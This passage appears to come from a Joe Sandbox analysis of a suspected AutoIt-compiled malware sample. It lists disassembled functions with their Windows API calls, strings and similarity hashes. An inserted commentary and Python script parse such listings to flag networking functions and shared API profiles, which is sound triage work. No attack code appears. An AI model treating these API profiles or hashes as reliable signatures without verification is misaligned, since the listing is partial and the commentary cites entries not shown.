                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Internet$OpenOption
                                            • String ID: <local>
                                            • API String ID: 942729171-4266983199
                                            • Opcode ID: a310b8f7f70f7519112b5c681eafc137c96d721c999bff96da4d3fffd7e4752b
                                            • Instruction ID: 1cb51937d588322f631dcf62f25ead2d0083083fc283dc6739f2943dbe66dfdc
                                            • Opcode Fuzzy Hash: a310b8f7f70f7519112b5c681eafc137c96d721c999bff96da4d3fffd7e4752b
                                            • Instruction Fuzzy Hash: 5011CEB0540225BADB24AF618C98EFBFF68EB06365F10912FFA0DA6040D2706945DBB1
                                            APIs
                                              • Part of subcall function 00E8830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00E880C8,?,00000000,?,?), ref: 00E88322
                                            • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E880CB
                                            • htons.WSOCK32(00000000,?,00000000), ref: 00E88108
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                            • String ID: 255.255.255.255
                                            • API String ID: 2496851823-2422070025
                                            • Opcode ID: 44ee800bed1fc3f832645dcfbb04ae1c69be7f293f729189091f62241699f15c
                                            • Instruction ID: 06ad4173c53528ee63367981ea1cc34a70fbeb0462d3ead1daa6bb3d7e7459c1
                                            • Opcode Fuzzy Hash: 44ee800bed1fc3f832645dcfbb04ae1c69be7f293f729189091f62241699f15c
                                            • Instruction Fuzzy Hash: 4B11C235540205ABDB20AFA4DD46FEEB364EF44314F109527E919B7291DE32A8058791
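Triaging a function listing of this shape by hand is slow, and the overview flags the binary as a likely compiled AutoIt script, so many of the entries above (window-class strings such as "Combobox", "edit" and "static", the InternetCrackUrlW and inet_addr helpers) read as the interpreter's own runtime library rather than the embedded script; an API-plus-string profile on its own will therefore match across unrelated AutoIt-compiled samples. The Python below is an added example, not part of the Joe Sandbox report or the sample: it parses entries in the layout used on this page (an "APIs" block followed by "Similarity" fields), pulls out the functions whose own calls touch a networking DLL, and groups entries by "API String ID" to show where distinct code (different "Opcode ID") shares one profile, as the two GetMenuItemInfoW entries above do. The sample text is a constructed excerpt copied from three entries on this page and trimmed to the lines the parser uses; the list of networking module names is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample input: three entries copied from the function listing above,
# trimmed to the lines the parser uses (other fields are tolerated and kept as-is).
SAMPLE = """APIs
  • Part of subcall function 00E8830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00E880C8,?,00000000,?,?), ref: 00E88322
• inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E880CB
• htons.WSOCK32(00000000,?,00000000), ref: 00E88108
Strings
Similarity
• API ID: ByteCharMultiWidehtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 2496851823-2422070025
• Opcode ID: 44ee800bed1fc3f832645dcfbb04ae1c69be7f293f729189091f62241699f15c
APIs
• _memset.LIBCMT ref: 00E72E00
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E72E3B
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 53603087c842768d16e1df0fd3d57330ecbe6689c4dce945d1ecbec841f60c1c
APIs
• _memset.LIBCMT ref: 00E72F11
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E72F30
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 89428a10ef72f2d43dda993e3ae9b5cfe23e004d516cd6affc3e0e389356c679
"""

# One API call line: optional "Part of subcall function <addr>: " prefix,
# then Name.MODULE, optional "(args)", optional comma, then " ref: <addr>".
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
# Any other "• Key: value" line (Similarity fields, Source File, ...).
FIELD_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+): (?P<value>.*)$")

# Assumption: modules whose presence marks a function as network-capable.
NETWORK_MODULES = {"WININET", "WSOCK32", "WS2_32", "WINHTTP"}


def parse_functions(text):
    """Split the listing into one record per function; each starts at an 'APIs' header."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"apis": [], "subcalls": [], "fields": {}}
            records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue  # section headers such as 'Strings' or 'Similarity'
        m = API_LINE.match(line)
        if m:
            call = {
                "name": m["name"],
                "module": m["module"].upper(),
                "ref": m["ref"],
                "caller": m["caller"],  # None for the function's own calls
                "args": m["args"].split(",") if m["args"] is not None else [],
            }
            (current["subcalls"] if m["caller"] else current["apis"]).append(call)
            continue
        m = FIELD_LINE.match(line)
        if m:
            current["fields"][m["key"]] = m["value"]
    return records


def network_functions(records):
    """Records whose own API calls (sub-calls excluded) touch a networking DLL."""
    return [r for r in records
            if any(c["module"] in NETWORK_MODULES for c in r["apis"])]


def opcode_ids_by_api_string_id(records):
    """Map each 'API String ID' to the distinct 'Opcode ID's carrying it.

    More than one opcode ID under a single key means separate code with the
    same API-plus-string profile, so the profile alone will not tell them apart.
    """
    groups = defaultdict(set)
    for r in records:
        key, opcode = r["fields"].get("API String ID"), r["fields"].get("Opcode ID")
        if key and opcode:
            groups[key].add(opcode)
    return dict(groups)


if __name__ == "__main__":
    recs = parse_functions(SAMPLE)
    for r in network_functions(recs):
        print("network:", [c["name"] for c in r["apis"]], "string:", r["fields"].get("String ID"))
    for key, ids in opcode_ids_by_api_string_id(recs).items():
        if len(ids) > 1:
            print("shared profile", key, "->", len(ids), "distinct opcode IDs")
```

Feed the full listing to `parse_functions` to get one record per entry; sub-calls are kept apart from the function's own calls so that a networking import reached only through a callee does not mark the caller as network code. When comparing samples, compare on "Opcode ID" or the fuzzy hashes rather than on "API String ID", since the grouping shows that one profile can cover several distinct functions.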
                                            APIs
                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E13C26,00ED62F8,?,?,?), ref: 00E20ACE
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            • _wcscat.LIBCMT ref: 00E550E1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FullNamePath_memmove_wcscat
                                            • String ID: c
                                            • API String ID: 257928180-921687731
                                            • Opcode ID: a6939b5eaf830b7d4d1d02a371de9378b443d1b03ec5a34872f1f0945f75748c
                                            • Instruction ID: 6e1b803da6f9a6664445be9f204d9b827e046b77b74cf2f49351fb38123e70b3
                                            • Opcode Fuzzy Hash: a6939b5eaf830b7d4d1d02a371de9378b443d1b03ec5a34872f1f0945f75748c
                                            • Instruction Fuzzy Hash: A4118C3590421C9F8B10EBA4EC42DDD77F8EF48354B0120A6B988F7291DA70DBC98711
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E6B0E7
                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E69355
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClassMessageNameSend_memmove
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 372448540-1403004172
                                            • Opcode ID: cb5d495ebc6c5e2bd52e315ad7305735a027b5e04d4614dce1cce52fca36456e
                                            • Instruction ID: aca00c3317c7e34d2c176f26f1bb300bfbb4aabb3ef4f1fcbd7f9304da939c31
                                            • Opcode Fuzzy Hash: cb5d495ebc6c5e2bd52e315ad7305735a027b5e04d4614dce1cce52fca36456e
                                            • Instruction Fuzzy Hash: E701F171A81214ABCB04EBA0CC91CFE77ADBF06360B10261AF872B73D2DB31584C8660
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E6B0E7
                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E6924D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClassMessageNameSend_memmove
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 372448540-1403004172
                                            • Opcode ID: e73c44a84551c722d4686afbd542ed946fb167f55e2fca07601aa19c5d33607e
                                            • Instruction ID: 004583db664f49a0f5413e4dc933d8a82da26970d79a56d98db222ee2a40eea3
                                            • Opcode Fuzzy Hash: e73c44a84551c722d4686afbd542ed946fb167f55e2fca07601aa19c5d33607e
                                            • Instruction Fuzzy Hash: 9701D871B81204BBCB14E7A0D996EFF77EC9F45740F142019B51273293EB215E4C8271
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E6B0E7
                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E692D0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClassMessageNameSend_memmove
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 372448540-1403004172
                                            • Opcode ID: 54cace0fb66c5fbd09fdaf8565e3d2aff353a8ebf46f941bafd0198e0cc9365f
                                            • Instruction ID: eee0e4926efcb40a0151f4011cdd4e17f9cd2c4779d60e9c6e64523fe765f266
                                            • Opcode Fuzzy Hash: 54cace0fb66c5fbd09fdaf8565e3d2aff353a8ebf46f941bafd0198e0cc9365f
                                            • Instruction Fuzzy Hash: D501A771A81204B7CB14E6A0D992EFF77EC9F15740F142116B812B3293DA315E4C9671
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __calloc_crt
                                            • String ID: @R
                                            • API String ID: 3494438863-2347139750
                                            • Opcode ID: 70fd7cc930359170e30f75abbf7188141781bdf15308f13e7d62808b67be1f73
                                            • Instruction ID: 67cd4e0e99aeb824c0063a26e41b8193e9f49dabc3769832120a0287aaf9dbe2
                                            • Opcode Fuzzy Hash: 70fd7cc930359170e30f75abbf7188141781bdf15308f13e7d62808b67be1f73
                                            • Instruction Fuzzy Hash: 69F04F71309716EFE7249B6AFD09BA12BD5EB50724F50942BE100FA2A0EB309889C684
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClassName_wcscmp
                                            • String ID: #32770
                                            • API String ID: 2292705959-463685578
                                            • Opcode ID: 4c46312a5f1c54e5defb4b9c5460013e899a74887f41b45a655ff40e78344ecc
                                            • Instruction ID: 59a5720c43af394fd9fa3765c06ea73c1facdeaf466c2a535bfbba3b366fe21b
                                            • Opcode Fuzzy Hash: 4c46312a5f1c54e5defb4b9c5460013e899a74887f41b45a655ff40e78344ecc
                                            • Instruction Fuzzy Hash: 26E02B3250032C1AD7109695AC09FA7F7ECEB40761F00006BFD14E3050E560990587D1
                                            APIs
                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E681CA
                                              • Part of subcall function 00E33598: _doexit.LIBCMT ref: 00E335A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Message_doexit
                                            • String ID: AutoIt$Error allocating memory.
                                            • API String ID: 1993061046-4017498283
                                            • Opcode ID: 501fbd87349a1468b249382675dae63b6531da9ca415db82b10f4514577af786
                                            • Instruction ID: f4fe82f8523ea1f1474b918c14f41da6ba7ce9c97849e0f3ff54a3ca765867c9
                                            • Opcode Fuzzy Hash: 501fbd87349a1468b249382675dae63b6531da9ca415db82b10f4514577af786
                                            • Instruction Fuzzy Hash: A5D05B323C531836D21832B56D0FFC57AC84F09B96F006066FB08B55D38DD299D282D9
                                            APIs
                                              • Part of subcall function 00E4B564: _memset.LIBCMT ref: 00E4B571
                                              • Part of subcall function 00E30B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E4B540,?,?,?,00E1100A), ref: 00E30B89
                                            • IsDebuggerPresent.KERNEL32(?,?,?,00E1100A), ref: 00E4B544
                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E1100A), ref: 00E4B553
                                            Strings
                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E4B54E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                            • API String ID: 3158253471-631824599
                                            • Opcode ID: 0b075a5621ed5c177d37c4bac571bc1e96bb75cde63e058e6fdb4eb524c6d7f1
                                            • Instruction ID: 81f3e26298727710b0ec302df153fe3dcca85608228351fc0d03cf5f1a8592d9
                                            • Opcode Fuzzy Hash: 0b075a5621ed5c177d37c4bac571bc1e96bb75cde63e058e6fdb4eb524c6d7f1
                                            • Instruction Fuzzy Hash: 75E092702003108FD721DF2AE404387BBE4AF44744F009D2EE486E3760DBB8D448CB61
                                            APIs
                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E95BF5
                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E95C08
                                              • Part of subcall function 00E754E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E7555E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FindMessagePostSleepWindow
                                            • String ID: Shell_TrayWnd
                                            • API String ID: 529655941-2988720461
                                            • Opcode ID: 11fd0d2ffe9960491b4001201b662262f6a9f73e20c5aab03a2543cd2f4ef3be
                                            • Instruction ID: 47ca1697f20e7096b0fcba7b477f9d24a57463091024bd1cfac0612e40c137a5
                                            • Opcode Fuzzy Hash: 11fd0d2ffe9960491b4001201b662262f6a9f73e20c5aab03a2543cd2f4ef3be
                                            • Instruction Fuzzy Hash: 2DD0A932388301BBE334AB31AC0BF932A10AB00B00F04083AB20AFA0D0D8E05800C240